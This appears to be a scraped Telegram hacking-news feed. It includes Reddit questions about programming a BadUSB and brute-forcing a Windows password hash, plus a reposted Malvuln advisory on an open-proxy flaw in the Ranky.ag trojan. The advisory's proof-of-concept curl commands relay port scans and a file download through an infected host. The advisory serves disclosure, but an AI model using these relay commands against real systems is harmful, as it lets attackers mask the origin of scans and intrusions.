Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Genymotion+Xposed+Inspeckage

Android application dynamic analysis lab setup on windowsContinue reading on InfoSec Write-ups »
Read more...
hacking: security in practice
How to setup bad usb?

Hello, i bought arduino uno bad usb. When i plugit in, it opens cmd and types nothing as expected. Now i do not know how to program it into actualy doing something, i have been searching trough internet for half an hour now, do I need some software or? Please help

submitted by /u/Velja14
[link] [comments]
hacking: security in practice
Crack Windows 10 password

I want to try finding out my Windows 10 password. I already know it, but I want to try finding it through Bruteforce. I already have the hash. I downloaded Hashcat. The problem is: I don't know what options to use. If somebody has already done this before or knows how to do this please help me.

submitted by /u/Hypnoticbat9555
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Proxy.Win32.Ranky.ag Unauthenticated Open Proxy

https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
Trojan-Proxy.Win32.Ranky.ag malware suffers from an unauthenticated open proxy vulnerability.

MD5 | 8974f0b9a6eb8c7f9829e7b6e5335622

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/af4868303124ee4f765a16328e8993a6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-Proxy.Win32.Ranky.ag
Vulnerability: Unauthenticated Open Proxy
Description: The malware listens on TCP port 19650. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.
Type: PE32
MD5: af4868303124ee4f765a16328e8993a6
Vuln ID: MVID-2021-0269
Dropped files:
Disclosure: 07/03/2021

Exploit/PoC:
Scan port 110)

curl -x http://192.168.18.129:19650 http://192.168.18.128:110
+OK INetSim POP3 Server ready <55726.1625248638@pop3host
-ERR Unknown command.
Scan port 21)

curl -x http://192.168.18.129:19650 http://192.168.18.128:21
220 INetSim FTP Service ready.
500 Unknown command.

Download filez)

curl -x http://192.168.18.129:19650 http://192.168.18.128/DOOM.exe --out DOOM.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 101k 100 101k 0 0 101k 0 0:00:01 --:--:-- 0:00:01 1630k
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com